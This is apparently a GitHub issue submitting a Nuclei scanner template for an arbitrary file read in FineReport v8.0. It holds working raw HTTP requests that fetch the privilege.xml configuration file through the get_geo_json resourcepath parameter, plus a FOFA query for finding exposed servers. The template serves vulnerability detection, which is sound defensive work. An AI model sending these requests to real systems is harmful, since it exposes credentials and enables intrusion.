### ISSUE TITLE
FineReport v8.0 Arbitrary file read 

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7979]
### Template Information:

finereport-v8-arbitrary-file-read
app="帆软-FineReport"

### Nuclei Template:

```yaml
id: finereport-v8-arbitrary-file-read

info:
  name: FineReport v8.0 Arbitrary file read 
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in finereport v8.0, which can be used by attackers to read arbitrary files.<br>
  metadata:
    fofa-query: app="fanruansem-FineReport"
  tags: Disclosure of Sensitive Information

http:
  - raw:
      - |
        GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml  HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml  HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"CDATA")'
          - 'status_code_2 == 200 && contains(body_2,"CDATA")'
        condition: or
```
